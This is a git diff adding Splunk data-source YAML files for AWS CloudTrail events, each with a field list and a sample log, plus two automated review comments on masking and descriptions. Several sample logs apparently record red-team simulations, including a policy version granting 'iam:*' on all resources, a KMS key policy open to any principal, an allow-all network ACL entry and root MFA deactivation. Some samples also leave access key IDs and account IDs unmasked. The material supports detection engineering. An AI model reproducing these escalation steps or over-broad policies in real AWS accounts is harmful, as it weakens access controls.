+ resources\",\n \"Effect\": \"Allow\",\n \"Principal\": {\n \"AWS\":
+ \"arn:aws:iam::111111111111:user/patrick_cli\"\n },\n \"Action\":
+ [\n \"kms:CreateGrant\",\n \"kms:ListGrants\",\n \"kms:RevokeGrant\"\n ],\n \"Resource\":
+ \"*\",\n \"Condition\": {\n \"Bool\": {\n \"kms:GrantIsForAWSResource\":
+ \"true\"\n }\n }\n },\n {\n \"Sid\":
+ \"Allow use of the key\",\n \"Effect\": \"Allow\",\n \"Principal\":
+ {\n \"AWS\": \"*\"\n },\n \"Action\": [\n \"kms:Encrypt\"\n ],\n \"Resource\":
+ \"*\"\n }\n ]\n}", "description": "", "customerMasterKeySpec": "SYMMETRIC_DEFAULT",
+ "bypassPolicyLockoutSafetyCheck": false, "tags": [], "keyUsage": "ENCRYPT_DECRYPT"},
+ "responseElements": {"keyMetadata": {"aWSAccountId": "111111111111", "keyId": "f2a82583-a7d3-4c92-8787-fe2baab1cee1",
+ "arn": "arn:aws:kms:us-west-2:111111111111:key/f2a82583-a7d3-4c92-8787-fe2baab1cee1",
+ "creationDate": "Jan 11, 2021, 9:56:30 AM", "enabled": true, "description": "",
+ "keyUsage": "ENCRYPT_DECRYPT", "keyState": "Enabled", "origin": "AWS_KMS", "keyManager":
+ "CUSTOMER", "customerMasterKeySpec": "SYMMETRIC_DEFAULT", "encryptionAlgorithms":
+ ["SYMMETRIC_DEFAULT"]}}, "requestID": "3356af25-a237-471f-ba5e-abb37d4a256f", "eventID":
+ "f09518ac-5ae5-4214-80ee-4f23ccdedd4c", "readOnly": false, "resources": [{"accountId":
+ "111111111111", "type": "AWS::KMS::Key", "ARN": "arn:aws:kms:us-west-2:111111111111:key/f2a82583-a7d3-4c92-8787-fe2baab1cee1"}],
+ "eventType": "AwsApiCall", "managementEvent": true, "eventCategory": "Management",
+ "recipientAccountId": "111111111111"}'
diff --git a/data_sources/aws_cloudtrail_createloginprofile.yml b/data_sources/aws_cloudtrail_createloginprofile.yml
new file mode 100644
index 0000000000..639885e9fd
--- /dev/null
+++ b/data_sources/aws_cloudtrail_createloginprofile.yml
@@ -0,0 +1,102 @@
+name: AWS CloudTrail CreateLoginProfile
+id: 0024fdb1-0d62-4449-970a-746952cf80b6
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for AWS CloudTrail CreateLoginProfile
+source: aws_cloudtrail
+sourcetype: aws:cloudtrail
+separator: eventName
+supported_TA:
+- name: Splunk Add-on for Amazon Web Services (AWS)
+ url: https://splunkbase.splunk.com/app/1876
+ version: 7.4.1
+fields:
+- _time
+- action
+- app
+- awsRegion
+- aws_account_id
+- change_type
+- command
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- errorCode
+- eventCategory
+- eventID
+- eventName
+- eventSource
+- eventTime
+- eventType
+- eventVersion
+- eventtype
+- host
+- index
+- linecount
+- managementEvent
+- msg
+- object_category
+- product
+- punct
+- readOnly
+- recipientAccountId
+- region
+- requestID
+- requestParameters.passwordResetRequired
+- requestParameters.userName
+- responseElements.loginProfile.createDate
+- responseElements.loginProfile.passwordResetRequired
+- responseElements.loginProfile.userName
+- signature
+- source
+- sourceIPAddress
+- sourcetype
+- splunk_server
+- src
+- src_ip
+- start_time
+- status
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user
+- userAgent
+- userIdentity.accessKeyId
+- userIdentity.accountId
+- userIdentity.arn
+- userIdentity.principalId
+- userIdentity.type
+- userIdentity.userName
+- userName
+- user_access_key
+- user_agent
+- user_arn
+- user_group_id
+- user_id
+- user_name
+- user_type
+- vendor
+- vendor_account
+- vendor_product
+- vendor_region
+example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "IAMUser", "principalId":
+ "AIDAYTOGP2RLEHRX5YWNV", "arn": "arn:aws:iam::111111111111:user/bhavin_cli", "accountId":
+ "111111111111", "accessKeyId": "AKIAYTOGP2RLLAA6NJUM", "userName": "bhavin_cli"},
+ "eventTime": "2021-03-05T01:02:38Z", "eventSource": "iam.amazonaws.com", "eventName":
+ "CreateLoginProfile", "awsRegion": "us-east-1", "sourceIPAddress": "73.15.72.101",
+ "userAgent": "aws-cli/2.0.62 Python/3.9.2 Darwin/19.6.0 source/x86_64 command/iam.create-login-profile",
+ "requestParameters": {"userName": "AtomicRedTeam", "passwordResetRequired": false},
+ "responseElements": {"loginProfile": {"userName": "AtomicRedTeam", "createDate":
+ "Mar 5, 2021 1:02:38 AM", "passwordResetRequired": false}}, "requestID": "f1b90364-8aed-4559-96cf-f5f2009bb7cb",
+ "eventID": "ffb76906-6dd1-4219-adfe-e26b92036a1e", "readOnly": false, "eventType":
+ "AwsApiCall", "managementEvent": true, "eventCategory": "Management", "recipientAccountId":
+ "111111111111"}'
diff --git a/data_sources/aws_cloudtrail_createnetworkaclentry.yml b/data_sources/aws_cloudtrail_createnetworkaclentry.yml
new file mode 100644
index 0000000000..dc1fe88ad0
--- /dev/null
+++ b/data_sources/aws_cloudtrail_createnetworkaclentry.yml
@@ -0,0 +1,121 @@
+name: AWS CloudTrail CreateNetworkAclEntry
+id: 45934028-10ec-4ab5-a7b1-a6349b833e67
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for AWS CloudTrail CreateNetworkAclEntry
+source: aws_cloudtrail
+sourcetype: aws:cloudtrail
+separator: eventName
+supported_TA:
+- name: Splunk Add-on for Amazon Web Services (AWS)
+ url: https://splunkbase.splunk.com/app/1876
+ version: 7.4.1
+fields:
+- _time
+- action
+- app
+- awsRegion
+- aws_account_id
+- change_type
+- command
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- direction
+- dvc
+- errorCode
+- eventCategory
+- eventID
+- eventName
+- eventSource
+- eventTime
+- eventType
+- eventVersion
+- eventtype
+- host
+- index
+- linecount
+- managementEvent
+- msg
+- object
+- object_category
+- object_id
+- product
+- protocol
+- protocol_code
+- punct
+- readOnly
+- recipientAccountId
+- region
+- requestID
+- requestParameters.aclProtocol
+- requestParameters.cidrBlock
+- requestParameters.egress
+- requestParameters.networkAclId
+- requestParameters.ruleAction
+- requestParameters.ruleNumber
+- responseElements._return
+- responseElements.requestId
+- rule_action
+- signature
+- source
+- sourceIPAddress
+- sourcetype
+- splunk_server
+- src
+- src_ip
+- src_ip_range
+- start_time
+- status
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user
+- userAgent
+- userIdentity.accessKeyId
+- userIdentity.accountId
+- userIdentity.arn
+- userIdentity.principalId
+- userIdentity.sessionContext.attributes.creationDate
+- userIdentity.sessionContext.attributes.mfaAuthenticated
+- userIdentity.sessionContext.sessionIssuer.accountId
+- userIdentity.sessionContext.sessionIssuer.arn
+- userIdentity.sessionContext.sessionIssuer.principalId
+- userIdentity.sessionContext.sessionIssuer.type
+- userIdentity.sessionContext.sessionIssuer.userName
+- userIdentity.type
+- userName
+- user_access_key
+- user_agent
+- user_arn
+- user_group_id
+- user_id
+- user_name
+- user_type
+- vendor
+- vendor_account
+- vendor_product
+- vendor_region
+example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "AssumedRole", "principalId":
+ "AROAIJIESMXKGCJRCTPR6:pbareiss@splunk.local", "arn": "arn:aws:sts::111111111111:assumed-role/okta_adm_role/pbareiss@splunk.local",
+ "accountId": "111111111111", "accessKeyId": "ASIAYTOGP2RLF3F7BXZK", "sessionContext":
+ {"sessionIssuer": {"type": "Role", "principalId": "AROAIJIESMXKGCJRCTPR6", "arn":
+ "arn:aws:iam::111111111111:role/okta_adm_role", "accountId": "111111111111", "userName":
+ "okta_adm_role"}, "webIdFederationData": {}, "attributes": {"mfaAuthenticated":
+ "false", "creationDate": "2021-01-12T08:36:15Z"}}}, "eventTime": "2021-01-12T08:38:39Z",
+ "eventSource": "ec2.amazonaws.com", "eventName": "CreateNetworkAclEntry", "awsRegion":
+ "eu-central-1", "sourceIPAddress": "95.90.199.65", "userAgent": "console.ec2.amazonaws.com",
+ "requestParameters": {"networkAclId": "acl-078ccebebcbabe175", "ruleNumber": 10,
+ "egress": false, "ruleAction": "allow", "icmpTypeCode": {}, "portRange": {}, "aclProtocol":
+ "-1", "cidrBlock": "0.0.0.0/0"}, "responseElements": {"requestId": "d29c9c32-3a72-48d3-b612-6ba795e9ec64",
+ "_return": true}, "requestID": "d29c9c32-3a72-48d3-b612-6ba795e9ec64", "eventID":
+ "6d1ce00e-4099-463c-8a4d-2af2fb2178ba", "readOnly": false, "eventType": "AwsApiCall",
+ "managementEvent": true, "eventCategory": "Management", "recipientAccountId": "111111111111"}'
diff --git a/data_sources/aws_cloudtrail_createpolicyversion.yml b/data_sources/aws_cloudtrail_createpolicyversion.yml
new file mode 100644
index 0000000000..1f73639beb
--- /dev/null
+++ b/data_sources/aws_cloudtrail_createpolicyversion.yml
@@ -0,0 +1,106 @@
+name: AWS CloudTrail CreatePolicyVersion
+id: f9f0f3da-37ec-4164-9ea0-0ae46645a86b
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for AWS CloudTrail CreatePolicyVersion
+source: aws_cloudtrail
+sourcetype: aws:cloudtrail
+separator: eventName
+supported_TA:
+- name: Splunk Add-on for Amazon Web Services (AWS)
+ url: https://splunkbase.splunk.com/app/1876
+ version: 7.4.1
+fields:
+- _time
+- action
+- app
+- awsRegion
+- aws_account_id
+- change_type
+- command
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- errorCode
+- eventCategory
+- eventID
+- eventName
+- eventSource
+- eventTime
+- eventType
+- eventVersion
+- eventtype
+- host
+- index
+- linecount
+- managementEvent
+- msg
+- object_category
+- product
+- punct
+- readOnly
+- recipientAccountId
+- region
+- requestID
+- requestParameters.policyArn
+- requestParameters.policyDocument
+- requestParameters.setAsDefault
+- responseElements.policyVersion.createDate
+- responseElements.policyVersion.isDefaultVersion
+- responseElements.policyVersion.versionId
+- signature
+- source
+- sourceIPAddress
+- sourcetype
+- splunk_server
+- src
+- src_ip
+- start_time
+- status
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user
+- userAgent
+- userIdentity.accessKeyId
+- userIdentity.accountId
+- userIdentity.arn
+- userIdentity.principalId
+- userIdentity.type
+- userIdentity.userName
+- userName
+- user_access_key
+- user_agent
+- user_arn
+- user_group_id
+- user_id
+- user_name
+- user_type
+- vendor
+- vendor_account
+- vendor_product
+- vendor_region
+example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "IAMUser", "principalId":
+ "AIDAYTOGP2RLNMCDVJZAY", "arn": "arn:aws:iam::111111111111:user/rhino_escalate",
+ "accountId": "111111111111", "accessKeyId": "AKIAYTOGP2RLHSQZPZFZ", "userName":
+ "rhino_escalate"}, "eventTime": "2021-02-23T00:02:30Z", "eventSource": "iam.amazonaws.com",
+ "eventName": "CreatePolicyVersion", "awsRegion": "us-east-1", "sourceIPAddress":
+ "73.15.72.101", "userAgent": "aws-cli/2.0.62 Python/3.9.0 Darwin/19.6.0 source/x86_64
+ command/iam.create-policy-version", "requestParameters": {"policyArn": "arn:aws:iam::111111111111:policy/rhino_escalate",
+ "policyDocument": "{\n \"Version\": \"2012-10-17\",\n \"Statement\": [\n {\n \"Sid\":
+ \"AllowEverything\",\n \"Effect\": \"Allow\",\n \"Action\":
+ \"iam:*\",\n \"Resource\": \"*\"\n }\n ]\n }", "setAsDefault":
+ true}, "responseElements": {"policyVersion": {"versionId": "v2", "isDefaultVersion":
+ true, "createDate": "Feb 23, 2021 12:02:30 AM"}}, "requestID": "fa42b4b2-f34a-4673-8f9f-b25cf1f5005a",
+ "eventID": "33149175-90fd-4cff-a43b-408e4f848c1c", "readOnly": false, "eventType":
+ "AwsApiCall", "managementEvent": true, "eventCategory": "Management", "recipientAccountId":
+ "111111111111"}'
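Review bot: The sample event's accessKeyId `AKIAYTOGP2RLHSQZPZFZ` and sourceIPAddress `73.15.72.101` are committed unmasked, while the sibling CreateSnapshot sample masks its key (`AKIAYTOGP2RLF5EAXXXX`) and this file already swaps the account ID for the `111111111111` placeholder, so sanitization is inconsistent across the new samples. The same unmasked key IDs and public source addresses appear in the DeactivateMFADevice, DeleteAccountPasswordPolicy, DeleteDetector, DeleteGroup, DeleteIPSet and DeleteLogGroup samples, and CreateVirtualMFADevice (`140429656527`) and DeleteGroup (`121522247101`) still carry non-placeholder account IDs in userIdentity, the ARNs and recipientAccountId. These files are static fixtures, so masking key IDs the way CreateSnapshot does and using the placeholder account ID throughout keeps secret scanners quiet and avoids publishing identifiers of a real account. Nothing in the `fields` lists depends on the literal values, so the change is confined to the `example_log` string.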
diff --git a/data_sources/aws_cloudtrail_createsnapshot.yml b/data_sources/aws_cloudtrail_createsnapshot.yml
new file mode 100644
index 0000000000..72c39f0b7b
--- /dev/null
+++ b/data_sources/aws_cloudtrail_createsnapshot.yml
@@ -0,0 +1,118 @@
+name: AWS CloudTrail CreateSnapshot
+id: 514135a2-f4b2-4d32-8f31-d87824887f9f
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for AWS CloudTrail CreateSnapshot
+source: aws_cloudtrail
+sourcetype: aws:cloudtrail
+separator: eventName
+supported_TA:
+- name: Splunk Add-on for Amazon Web Services (AWS)
+ url: https://splunkbase.splunk.com/app/1876
+ version: 7.4.1
+fields:
+- _time
+- app
+- awsRegion
+- aws_account_id
+- change_type
+- command
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- errorCode
+- eventCategory
+- eventID
+- eventName
+- eventSource
+- eventTime
+- eventType
+- eventVersion
+- eventtype
+- host
+- index
+- linecount
+- managementEvent
+- msg
+- object_category
+- product
+- punct
+- readOnly
+- recipientAccountId
+- region
+- requestID
+- requestParameters.tagSpecificationSet.items{}.resourceType
+- requestParameters.tagSpecificationSet.items{}.tags{}.key
+- requestParameters.tagSpecificationSet.items{}.tags{}.value
+- requestParameters.volumeId
+- responseElements.encrypted
+- responseElements.ownerId
+- responseElements.requestId
+- responseElements.snapshotId
+- responseElements.startTime
+- responseElements.status
+- responseElements.tagSet.items{}.key
+- responseElements.tagSet.items{}.value
+- responseElements.volumeId
+- responseElements.volumeSize
+- signature
+- source
+- sourceIPAddress
+- sourcetype
+- splunk_server
+- src
+- src_ip
+- start_time
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- tlsDetails.cipherSuite
+- tlsDetails.clientProvidedHostHeader
+- tlsDetails.tlsVersion
+- user
+- userAgent
+- userIdentity.accessKeyId
+- userIdentity.accountId
+- userIdentity.arn
+- userIdentity.principalId
+- userIdentity.type
+- userIdentity.userName
+- userName
+- user_access_key
+- user_agent
+- user_arn
+- user_group_id
+- user_id
+- user_name
+- user_type
+- vendor
+- vendor_account
+- vendor_product
+- vendor_region
+example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "IAMUser", "principalId":
+ "AIDAYTOGP2RLCNEAQXWZV", "arn": "arn:aws:iam::111111111111:user/bhavin_console",
+ "accountId": "111111111111", "accessKeyId": "AKIAYTOGP2RLF5EAXXXX", "userName":
+ "bhavin_console"}, "eventTime": "2023-03-20T22:31:18Z", "eventSource": "ec2.amazonaws.com",
+ "eventName": "CreateSnapshot", "awsRegion": "us-west-2", "sourceIPAddress": "72.135.1.1",
+ "userAgent": "APN/1.0 HashiCorp/1.0 Terraform/1.1.2 (+https://www.terraform.io)
+ terraform-provider-aws/3.76.1 (+https://registry.terraform.io/providers/hashicorp/aws)
+ aws-sdk-go/1.44.157 (go1.19.3; darwin; amd64) stratus-red-team_46665bb8-dc15-4aba-a5ad-a362772b3f0d
+ HashiCorp-terraform-exec/0.17.3", "requestParameters": {"volumeId": "vol-0363e53e12f67c9b7",
+ "tagSpecificationSet": {"items": [{"resourceType": "snapshot", "tags": [{"key":
+ "StratusRedTeam", "value": "true"}]}]}}, "responseElements": {"requestId": "fefed928-d461-45f0-802f-a99d94c833a8",
+ "snapshotId": "snap-02effb3bb62786b18", "volumeId": "vol-0363e53e12f67c9b7", "status":
+ "pending", "startTime": 1679351478226, "ownerId": "111111111111", "volumeSize":
+ "1", "encrypted": false, "tagSet": {"items": [{"key": "StratusRedTeam", "value":
+ "true"}]}}, "requestID": "fefed928-d461-45f0-802f-a99d94c833a8", "eventID": "2d52d141-d1e6-4d1f-a380-1461c1bf9f83",
+ "readOnly": false, "eventType": "AwsApiCall", "managementEvent": true, "recipientAccountId":
+ "111111111111", "eventCategory": "Management", "tlsDetails": {"tlsVersion": "TLSv1.2",
+ "cipherSuite": "ECDHE-RSA-AES128-GCM-SHA256", "clientProvidedHostHeader": "ec2.us-west-2.amazonaws.com"}}'
diff --git a/data_sources/aws_cloudtrail_createtask.yml b/data_sources/aws_cloudtrail_createtask.yml
new file mode 100644
index 0000000000..a1f33c5b39
--- /dev/null
+++ b/data_sources/aws_cloudtrail_createtask.yml
@@ -0,0 +1,121 @@
+name: AWS CloudTrail CreateTask
+id: 6501e4fe-05b2-45f1-bd51-9e06a94fa7d9
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for AWS CloudTrail CreateTask
+source: aws_cloudtrail
+sourcetype: aws:cloudtrail
+separator: eventName
+supported_TA:
+- name: Splunk Add-on for Amazon Web Services (AWS)
+ url: https://splunkbase.splunk.com/app/1876
+ version: 7.4.1
+fields:
+- _time
+- app
+- awsRegion
+- aws_account_id
+- command
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- errorCode
+- eventCategory
+- eventID
+- eventName
+- eventSource
+- eventTime
+- eventType
+- eventVersion
+- eventtype
+- host
+- index
+- linecount
+- managementEvent
+- msg
+- object_category
+- product
+- punct
+- readOnly
+- recipientAccountId
+- region
+- requestID
+- requestParameters.cloudWatchLogGroupArn
+- requestParameters.destinationLocationArn
+- requestParameters.options.logLevel
+- requestParameters.options.verifyMode
+- requestParameters.schedule.scheduleExpression
+- requestParameters.sourceLocationArn
+- responseElements.taskArn
+- sessionCredentialFromConsole
+- signature
+- source
+- sourceIPAddress
+- sourcetype
+- splunk_server
+- src
+- src_ip
+- start_time
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- tlsDetails.cipherSuite
+- tlsDetails.clientProvidedHostHeader
+- tlsDetails.tlsVersion
+- user
+- userAgent
+- userIdentity.accessKeyId
+- userIdentity.accountId
+- userIdentity.arn
+- userIdentity.principalId
+- userIdentity.sessionContext.attributes.creationDate
+- userIdentity.sessionContext.attributes.mfaAuthenticated
+- userIdentity.sessionContext.sessionIssuer.accountId
+- userIdentity.sessionContext.sessionIssuer.arn
+- userIdentity.sessionContext.sessionIssuer.principalId
+- userIdentity.sessionContext.sessionIssuer.type
+- userIdentity.sessionContext.sessionIssuer.userName
+- userIdentity.type
+- userName
+- user_access_key
+- user_agent
+- user_arn
+- user_group_id
+- user_id
+- user_name
+- user_type
+- vendor
+- vendor_account
+- vendor_product
+- vendor_region
+example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "AssumedRole", "principalId":
+ "AROAYTOGP2RLDF6WQQQQQ:abc@acme.com", "arn": "arn:aws:sts::111111111111:assumed-role/AWSReservedSSO_SPLKAdministratorAccess_d9ce1347d0a6dd3f/abc@acme.com",
+ "accountId": "111111111111", "accessKeyId": "ASIAYTOGP2RLOB2GM111", "sessionContext":
+ {"sessionIssuer": {"type": "Role", "principalId": "AROAYTOGP2RLDF6WQQQQQ", "arn":
+ "arn:aws:iam::111111111111:role/aws-reserved/sso.amazonaws.com/us-west-2/AWSReservedSSO_SPLKAdministratorAccess_d9ce1347d0a6dd3f",
+ "accountId": "111111111111", "userName": "AWSReservedSSO_SPLKAdministratorAccess_d9ce1347d0a6dd3f"},
+ "webIdFederationData": {}, "attributes": {"creationDate": "2023-03-14T21:53:15Z",
+ "mfaAuthenticated": "false"}}}, "eventTime": "2023-03-14T22:05:36Z", "eventSource":
+ "datasync.amazonaws.com", "eventName": "CreateTask", "awsRegion": "us-west-2", "sourceIPAddress":
+ "1.1.1.1", "userAgent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36
+ (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36", "requestParameters": {"sourceLocationArn":
+ "arn:aws:datasync:us-west-2:111111111111:location/loc-0921d426f7955d416", "destinationLocationArn":
+ "arn:aws:datasync:us-west-1:111111111111:location/loc-0b94cf657c358ef06", "cloudWatchLogGroupArn":
+ "arn:aws:logs:us-west-2:111111111111:log-group:/aws/datasync", "options": {"verifyMode":
+ "ONLY_FILES_TRANSFERRED", "logLevel": "BASIC"}, "excludes": [], "schedule": {"scheduleExpression":
+ "cron(6 * * * ? *)"}, "tags": [], "includes": []}, "responseElements": {"taskArn":
+ "arn:aws:datasync:us-west-2:111111111111:task/task-0c77dc0d4b0792ce6"}, "requestID":
+ "de5f4282-aa2b-49b8-8d1b-c3bdb11e2fba", "eventID": "def4cd05-f845-4aec-bc96-07d6ce420d16",
+ "readOnly": false, "eventType": "AwsApiCall", "managementEvent": true, "recipientAccountId":
+ "111111111111", "eventCategory": "Management", "tlsDetails": {"tlsVersion": "TLSv1.2",
+ "cipherSuite": "ECDHE-RSA-AES128-GCM-SHA256", "clientProvidedHostHeader": "datasync.us-west-2.amazonaws.com"},
+ "sessionCredentialFromConsole": "true"}'
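Review bot: The `description` is the generic "Data source object for AWS CloudTrail CreateTask" and, with `separator: eventName`, the file keys on the event name alone, so nothing in the YAML records which API this is — the eventSource `datasync.amazonaws.com` is only visible inside the `example_log` string. Naming the service in the description, e.g. `description: Data source object for AWS CloudTrail CreateTask (eventSource datasync.amazonaws.com)`, lets a reader match the data source to the right API without parsing the sample. The same generic-description pattern applies to DeleteDetector and DeleteIPSet (`guardduty.amazonaws.com`) and DeleteLogGroup (`logs.amazonaws.com`) below.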
diff --git a/data_sources/aws_cloudtrail_createvirtualmfadevice.yml b/data_sources/aws_cloudtrail_createvirtualmfadevice.yml
new file mode 100644
index 0000000000..7820bed6ed
--- /dev/null
+++ b/data_sources/aws_cloudtrail_createvirtualmfadevice.yml
@@ -0,0 +1,100 @@
+name: AWS CloudTrail CreateVirtualMFADevice
+id: 13e6e952-0dad-4190-865c-fb5911725f7a
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for AWS CloudTrail CreateVirtualMFADevice
+source: aws_cloudtrail
+sourcetype: aws:cloudtrail
+separator: eventName
+supported_TA:
+- name: Splunk Add-on for Amazon Web Services (AWS)
+ url: https://splunkbase.splunk.com/app/1876
+ version: 7.4.1
+fields:
+- _time
+- action
+- app
+- awsRegion
+- aws_account_id
+- change_type
+- command
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- errorCode
+- eventCategory
+- eventID
+- eventName
+- eventSource
+- eventTime
+- eventType
+- eventVersion
+- eventtype
+- host
+- index
+- linecount
+- managementEvent
+- msg
+- object_category
+- product
+- punct
+- readOnly
+- recipientAccountId
+- region
+- requestID
+- requestParameters.path
+- requestParameters.virtualMFADeviceName
+- responseElements.virtualMFADevice.serialNumber
+- sessionCredentialFromConsole
+- signature
+- source
+- sourceIPAddress
+- sourcetype
+- splunk_server
+- src
+- src_ip
+- start_time
+- status
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user
+- userAgent
+- userIdentity.accessKeyId
+- userIdentity.accountId
+- userIdentity.arn
+- userIdentity.principalId
+- userIdentity.sessionContext.attributes.creationDate
+- userIdentity.sessionContext.attributes.mfaAuthenticated
+- userIdentity.type
+- userName
+- user_access_key
+- user_agent
+- user_arn
+- user_group_id
+- user_id
+- user_type
+- vendor
+- vendor_account
+- vendor_product
+- vendor_region
+example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "Root", "principalId":
+ "140429656527", "arn": "arn:aws:iam::140429656527:root", "accountId": "140429656527",
+ "accessKeyId": "ASIASBMSCQHH2YXNXJBU", "sessionContext": {"sessionIssuer": {}, "webIdFederationData":
+ {}, "attributes": {"creationDate": "2023-01-30T22:59:36Z", "mfaAuthenticated": "false"}}},
+ "eventTime": "2023-01-30T23:02:23Z", "eventSource": "iam.amazonaws.com", "eventName":
+ "CreateVirtualMFADevice", "awsRegion": "us-east-1", "sourceIPAddress": "23.93.193.6",
+ "userAgent": "AWS Internal", "requestParameters": {"path": "/", "virtualMFADeviceName":
+ "strt_mfa_2"}, "responseElements": {"virtualMFADevice": {"serialNumber": "arn:aws:iam::140429656527:mfa/strt_mfa_2"}},
+ "requestID": "2fbe2074-55f8-4ec6-ad32-0b250803cf46", "eventID": "7e1c493d-c3c3-4f4a-ae4f-8cdd38970027",
+ "readOnly": false, "eventType": "AwsApiCall", "managementEvent": true, "recipientAccountId":
+ "140429656527", "eventCategory": "Management", "sessionCredentialFromConsole": "true"}'
diff --git a/data_sources/aws_cloudtrail_deactivatemfadevice.yml b/data_sources/aws_cloudtrail_deactivatemfadevice.yml
new file mode 100644
index 0000000000..21dcced0f2
--- /dev/null
+++ b/data_sources/aws_cloudtrail_deactivatemfadevice.yml
@@ -0,0 +1,100 @@
+name: AWS CloudTrail DeactivateMFADevice
+id: 7397a10b-1150-4de9-8062-a96454ae53b2
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for AWS CloudTrail DeactivateMFADevice
+source: aws_cloudtrail
+sourcetype: aws:cloudtrail
+separator: eventName
+supported_TA:
+- name: Splunk Add-on for Amazon Web Services (AWS)
+ url: https://splunkbase.splunk.com/app/1876
+ version: 7.4.1
+fields:
+- _time
+- action
+- app
+- awsRegion
+- aws_account_id
+- change_type
+- command
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- errorCode
+- eventCategory
+- eventID
+- eventName
+- eventSource
+- eventTime
+- eventType
+- eventVersion
+- eventtype
+- host
+- index
+- linecount
+- managementEvent
+- msg
+- object_category
+- product
+- punct
+- readOnly
+- recipientAccountId
+- region
+- requestID
+- requestParameters.serialNumber
+- requestParameters.userName
+- responseElements
+- signature
+- source
+- sourceIPAddress
+- sourcetype
+- splunk_server
+- src
+- src_ip
+- start_time
+- status
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user
+- userAgent
+- userIdentity.accessKeyId
+- userIdentity.accountId
+- userIdentity.arn
+- userIdentity.principalId
+- userIdentity.sessionContext.attributes.creationDate
+- userIdentity.sessionContext.attributes.mfaAuthenticated
+- userIdentity.type
+- userName
+- user_access_key
+- user_agent
+- user_arn
+- user_group_id
+- user_id
+- user_name
+- user_type
+- vendor
+- vendor_account
+- vendor_product
+- vendor_region
+example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "Root", "principalId":
+ "111111111111", "arn": "arn:aws:iam::111111111111:root", "accountId": "111111111111",
+ "accessKeyId": "ASIASBMSCQHHWAIHMHUX", "sessionContext": {"sessionIssuer": {}, "webIdFederationData":
+ {}, "attributes": {"creationDate": "2022-10-04T16:13:23Z", "mfaAuthenticated": "true"}}},
+ "eventTime": "2022-10-04T16:13:45Z", "eventSource": "iam.amazonaws.com", "eventName":
+ "DeactivateMFADevice", "awsRegion": "us-east-1", "sourceIPAddress": "142.254.89.27",
+ "userAgent": "Coral/Netty4", "requestParameters": {"userName": "AWS ROOT USER",
+ "serialNumber": "arn:aws:iam::111111111111:mfa/root-account-mfa-device"}, "responseElements":
+ null, "requestID": "d27cfb15-34b4-4c16-82bc-a55d15b4e47d", "eventID": "bfe9fd91-0b4d-470a-9c03-77839151806d",
+ "readOnly": false, "eventType": "AwsApiCall", "managementEvent": true, "recipientAccountId":
+ "111111111111", "eventCategory": "Management"}'
diff --git a/data_sources/aws_cloudtrail_deleteaccountpasswordpolicy.yml b/data_sources/aws_cloudtrail_deleteaccountpasswordpolicy.yml
new file mode 100644
index 0000000000..e27f2b78ca
--- /dev/null
+++ b/data_sources/aws_cloudtrail_deleteaccountpasswordpolicy.yml
@@ -0,0 +1,100 @@
+name: AWS CloudTrail DeleteAccountPasswordPolicy
+id: b0730ac8-0992-4de8-b000-2c7d0fc7a67f
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for AWS CloudTrail DeleteAccountPasswordPolicy
+source: aws_cloudtrail
+sourcetype: aws:cloudtrail
+separator: eventName
+supported_TA:
+- name: Splunk Add-on for Amazon Web Services (AWS)
+ url: https://splunkbase.splunk.com/app/1876
+ version: 7.4.1
+fields:
+- _time
+- action
+- app
+- awsRegion
+- aws_account_id
+- change_type
+- command
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- desc
+- dest
+- dvc
+- errorCode
+- eventCategory
+- eventID
+- eventName
+- eventSource
+- eventTime
+- eventType
+- eventVersion
+- eventtype
+- host
+- index
+- linecount
+- managementEvent
+- msg
+- object_category
+- product
+- punct
+- readOnly
+- recipientAccountId
+- region
+- requestID
+- requestParameters
+- responseElements
+- sessionCredentialFromConsole
+- signature
+- source
+- sourceIPAddress
+- sourcetype
+- splunk_server
+- src
+- src_ip
+- start_time
+- status
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user
+- userAgent
+- userIdentity.accessKeyId
+- userIdentity.accountId
+- userIdentity.arn
+- userIdentity.principalId
+- userIdentity.sessionContext.attributes.creationDate
+- userIdentity.sessionContext.attributes.mfaAuthenticated
+- userIdentity.type
